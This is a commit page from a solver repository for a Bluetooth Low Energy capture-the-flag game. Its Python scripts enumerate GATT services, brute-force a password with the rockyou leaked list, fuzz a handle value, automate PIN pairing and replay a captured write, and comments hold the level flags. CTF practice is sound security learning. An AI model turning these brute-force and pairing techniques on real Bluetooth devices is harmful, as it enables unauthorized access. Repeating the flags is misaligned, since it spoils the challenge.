lvl 0 - 6 complete, useful scripts added)
1 parent 8414234 commit a68a78d28bf9ad54ee3d3c593d4b609942bf735d
0xRM authored on 14 Feb 2021
Showing 17 changed files
View
1
■■■■
ctf_mac.txt 0 → 100644
3c:71:bf:f1:ef:c6
View
23
enumerate.py 0 → 100755
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
print ("Attached to peripheral")
services=p.getServices()
for service in services:
print (service)
q = service.getCharacteristics()
for characteristic in q:
hex1 = int(format(characteristic.getHandle(),'02X'), 16)
if (characteristic.supportsRead()):
hex2 = binascii.b2a_hex(p.readCharacteristic(hex1))
hexlif2 = binascii.unhexlify(hex2)
print (str(hex1)+" 0x"+ format(characteristic.getHandle(),'02X') +" "+ characteristic.propertiesToString() + " " + hexlif2)
else:
print (str(hex1)+" 0x"+ format(characteristic.getHandle(),'02X') +" "+ characteristic.propertiesToString() )
p.disconnect()
View
2
■■■
enumerate.sh 0 → 100755
#!/bin/bash
bleah -b `cat ctf_mac.txt` -e
View
46
level_04.py 0 → 100644
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
'''
42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
44 0x2C NOTIFY WRITE
46 0x2E READ WRITE write here to goto to scoreboard
'''
 
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID(0x00FF)
print ("Attached to peripheral")
 
print("Loading level 04")
hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
 
password = "AABBCCDDEEFF"
 
sys.stdout.write("\rTrying: %s " % password.rstrip())
response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True)
while True:
if p.waitForNotifications(1.0):
# handleNotification() was called
continue
print "Waiting..."
#hex1 = p.readCharacteristic(0x2C)
#hex2 = binascii.b2a_hex(hex1)
#hexlif2 = str(binascii.unhexlify(hex2))
class MyDelegate(btle.DefaultDelegate):
def __init__(self, params):
btle.DefaultDelegate.__init__(self)
# ... initialise here
 
def handleNotification(self, cHandle, data):
# ... perhaps check cHandle
# ... process 'data'
print("Data: "+data)
 
p.disconnect()
View
61
load_level.py 0 → 100755
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
chall_uuid = 0x30
board_uuid = 0x2e
score_uuid = 0x00ff
 
if len(sys.argv) != 2:
print "Requires level no.:", sys.argv[0], "<0-9 or \"s\" for scoreboard>"
quit()
 
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
#p.connect(deviceMAC, "public")
if( sys.argv[1] == "s"):
# load scroebaord... hopefully
print("Loading scoreboard")
#deviceMAC = open('ctf_mac.txt').read()
#p = btle.Peripheral(deviceMAC)
response = p.writeCharacteristic(board_uuid, "fuck you")
else:
level = int(sys.argv[1])
level_hex = str('%0*x' % (4,level))
print level_hex
 
 
#print ("Attached to peripheral")
#services = p.getServiceByUUID(score_uuid)
#char = services.getCharacteristics(chall_uuid)[0]
 
print("Loading level")
#char.write(level_hex)
hex1 = binascii.unhexlify(level_hex)
response = p.writeCharacteristic(chall_uuid, hex1)
 
print("If error try again...it takes a few attempts, BLE is a bit crap")
p.disconnect()
time.sleep(1)
p = btle.Peripheral(deviceMAC)
 
scoreboard = p.getServiceByUUID(score_uuid)
q = scoreboard.getCharacteristics()
scoreboard = p.getServiceByUUID(score_uuid)
q = scoreboard.getCharacteristics()
for characteristic in q:
hex1 = int(format(characteristic.getHandle(),'02X'), 16)
if (characteristic.supportsRead()):
#hex2 = binascii.b2a_hex(p.readCharacteristic(hex1))
#hexlif2 = binascii.unhexlify(hex2)
hexlif2 = characteristic.read()
print (str(hex1)+" 0x"+ format(characteristic.getHandle(),'02X') +" "+ characteristic.propertiesToString() + " " + hexlif2)
else:
print (str(hex1)+" 0x"+ format(characteristic.getHandle(),'02X') +" "+ characteristic.propertiesToString() )
p.disconnect()
View
29
lvl_00.py 0 → 100755
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
'''
simply follow the example https://github.com/hackgnar/ble_ctf_infinity
to ensure know how to read and write to charachteristics and know the basics of how to navigate the game
understand GATT services, charachteristics and handles.. the basics.
'''
 
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
print ("Attached to peripheral")
 
handle = "0x2e"
content = "12345678901234567890"
 
print("Sending \"12345678901234567890\" to 0x2e")
 
services=p.getServices()
 
hex_int = int(handle, 16)
hex1 = binascii.hexlify(handle)
response = p.writeCharacteristic(hex_int, content, True)
print("Done")
 
p.disconnect()
View
29
lvl_01.py 0 → 100755
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
'''
42 0x2A READ goodbye 👋
 
fc3fd58dcdad9ab23fac
'''
 
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID(0x00FF)
print ("Attached to peripheral")
 
print("Loading level 1")
hex1 = binascii.unhexlify(str('%0*x' % (4,1)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
 
 
print("Reading value")
hex1 = p.readCharacteristic(0x2C)
hex2 = binascii.b2a_hex(hex1)
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: %s" % hexlif2)
 
p.disconnect()
View
41
lvl_02.py 0 → 100755
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
'''
42 0x2A READ WRITE Enter password here. Use rockyou.
44 0x2C READ
46 0x2E READ WRITE write here to goto to scoreboard
 
password1234 - eca7d1f3cf60a8b5344a
'''
 
rockyou = "/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt"
 
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID(0x00FF)
print ("Attached to peripheral")
 
print("Loading level 02")
hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
 
with open(rockyou) as f:
for password in f:
sys.stdout.write("\rTrying: %s " % password.rstrip())
response = p.writeCharacteristic(0x2A, password.rstrip(), withResponse=True)
hex1 = p.readCharacteristic(0x2C)
hex2 = binascii.b2a_hex(hex1)
hexlif2 = str(binascii.unhexlify(hex2))
if hexlif2 <> "":
print "\rPassword Found: %s" % password.rstrip()
print "Flag: %s" % hexlif2
break;
p.disconnect()
View
110
lvl_03.py 0 → 100755
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function # import print from python3: end=""
import time
import re
import pexpect # sudo apt-get install python-pexpect
import subprocess
import random
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
 
'''
Service <uuid=Heart Rate handleStart=40 handleEnd=65535>
42 0x2A READ Connect with pin 0000. Try using bluetoothctl
 
b46fa238cf820d0f60c1
'''
 
# !!! make sure bluetoothd runs in --compat mode before executing this script !!!
def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions)
"exectutes pairing with entered PIN on bluetooth adapter side"
try:
 
newpid = os.fork()
if newpid == 0:
'''
Start bluepy stuff
'''
subprocess.call(['hciconfig','hci0','down'])
subprocess.call(['hciconfig','hci0','up'])
 
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb")
print ("Attached to peripheral")
hex1 = p.readCharacteristic(0x2C)
hex2 = binascii.b2a_hex(hex1)
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: "+hexlif2)
p.disconnect()
exit()
else:
'''
Start actual pair stuff
'''
subprocess.call(['hciconfig','hci0','sspmode', '0'])
# bluetoothctl
child = pexpect.spawn('bluetoothctl')
child.logfile = open("/tmp/mylog", "w")
child.expect("#")
child.sendline('agent off') # might be unnecessary
#child.sendline('scan on') # might be unnecessary
child.expect("unregistered")
child.sendline('agent KeyboardDisplay ')
child.expect("Agent registered")
child.sendline('pairable on')
child.expect("pairable on succeeded")
child.sendline('discoverable on')
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
child.sendline('pair 3c:71:bf:f1:ef:c6')
 
child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic
print ('Sending PIN: ' + pin)
child.sendline(pin)
i = child.expect(['Paired: yes', 'Enter passkey:'], timeout = time_limit)
if i == 0: # found 'Paired: yes' == successful pairing
trust_mac = 'trust ' + re.search(r'(?:[0-9a-fA-F]:?){12}.+$', child.before).group(0) # extract MAC from last line, one with 'Paired: Yes'
child.sendline(trust_mac) # optionally add device to trusted
child.expect('trust succeeded', timeout = 10)
pairing_status = True
else: # i == 1
print('wrong PIN, retrying if time will allow')
except pexpect.EOF:
print ('!!!!!!!! EOF')
except pexpect.TIMEOUT:
print ('!!!!!!!! TIMEOUT')
# hide Pi's bluetooth for security reasons
child.sendline('pairable off')
child.expect("pairable off succeeded")
child.sendline('discoverable off')
child.expect("discoverable off succeeded")
child.close()
return pairing_status
 
#main program body
PAIRING_TIME_LIMIT = 60
BT_PIN = "0000" # random.randint(1000,10000) # generate random 4-digit PIN 1000..9999
 
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID(0x00FF)
print ("Attached to peripheral")
 
print("Loading level 02")
hex1 = binascii.unhexlify(str('%0*x' % (4,3)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
 
p.disconnect()
 
status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT)
if status == True:
print('Pairing successful')
View
104
lvl_04.py 0 → 100755
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
import itertools
'''
42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
44 0x2C NOTIFY WRITE
46 0x2E READ WRITE write here to goto to scoreboard
 
Flag: f401f21d02fdd0a4fc00
'''
 
notificationData = ""
 
class MyDelegate(btle.DefaultDelegate):
def __init__(self, hndl):
btle.DefaultDelegate.__init__(self)
self.hndl=hndl;
 
def handleNotification(self, cHandle, data):
global notificationData
notificationData = data
#print("d: "+data)
 
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
 
print ("Attached to peripheral")
 
print("Loading level 04")
hex1 = binascii.unhexlify(str('%0*x' % (4,4)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
p.disconnect()
 
'''
# of course not, this brute-force would make sense!
charset = "01234565789ABCDEF"
generator = itertools.chain.from_iterable((''.join(l)
for l in itertools.product(charset, repeat=i))
for i in range(4,5))
'''
 
'''
# not this!
print("Generating wordlist")
charset = "01234565789ABCDEF"
generator = itertools.chain.from_iterable((''.join(l)
for l in itertools.product(charset, repeat=i))
for i in range(12,13))
'''
 
print("Generating wordlist")
generator = list()
charset = list("0123456789ABCDEF")
origPass = list("AABBCCDDEEFF")
for x in range(len(origPass)):
newPass = list("AABBCCDDEEFF")
for y in range(len(charset)):
newPass = list("AABBCCDDEEFF")
newPass[x] = charset[y]
generator.append("".join(newPass))
 
for password in generator:
hexlif2 = binascii.unhexlify(password)
hexlif2 = str(hexlif2)
 
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
 
try:
srvs = (p.getServices());
chs=srvs[2].getCharacteristics();
ch=chs[1];
cccd = ch.valHandle + 1
#print(str(ch)+str(ch.propertiesToString())); # print charchteristic's properties i.e. READ, WRITE, NOTIFY
 
p.setDelegate(MyDelegate(ch.getHandle()));
svc=p.getServiceByUUID(0x00FF)
p.writeCharacteristic(cccd, b"\x01\x00");
 
sys.stdout.write("\rTrying: %s" % password.rstrip())
response = p.writeCharacteristic(0x2C, hexlif2)
 
gotResponse = False
while gotResponse == False:
if p.waitForNotifications(1.0):
rsp = notificationData
hex = binascii.b2a_hex(rsp)
hexstr = str(hex).strip("0").upper()
#sys.stdout.write(" Response: " + hexstr) # for debugging
if(password.strip("0") != hexstr):
print(" Flag: %s" % notificationData.rstrip())
exit()
else:
gotResponse = True
continue
print "Waiting..."
finally:
p.disconnect()
View
38
lvl_05.py 0 → 100755
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
'''
42 0x2A READ find a valid write value in this pcap to use below
44 0x2C READ WRITE https://github.com/hackgnar/ble_ctf_infinity/blob/master/gatt_servers/pcap_write/write_sample.pcap
46 0x2E READ WRITE write here to goto to scoreboard
 
84cf61c35b2d9c92217d
'''
 
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID(0x00FF)
print ("Attached to peripheral")
 
print("Loading level 05")
hex1 = binascii.unhexlify(str('%0*x' % (4,5)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
 
print("Sending \"121212121222\" to 0x2c")
 
services=p.getServices()
 
hexlif2 = binascii.unhexlify("121212121222")
hexlif2 = str(hexlif2)
response = p.writeCharacteristic(0x2C, hexlif2, True)
 
print("Reading value")
hex1 = p.readCharacteristic(0x2C)
hex2 = binascii.b2a_hex(hex1)
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: %s" % hexlif2)
 
p.disconnect()
View
lvl_05_solution.png 0 → 100644
View
lvl_06.py 0 → 100755
View
notes.txt 0 → 100644
View
reset_scoreboard.py 0 → 100755
View
send2handle.py 0 → 100755
View
submit_flag.py 0 → 100755
Buy Me A Coffee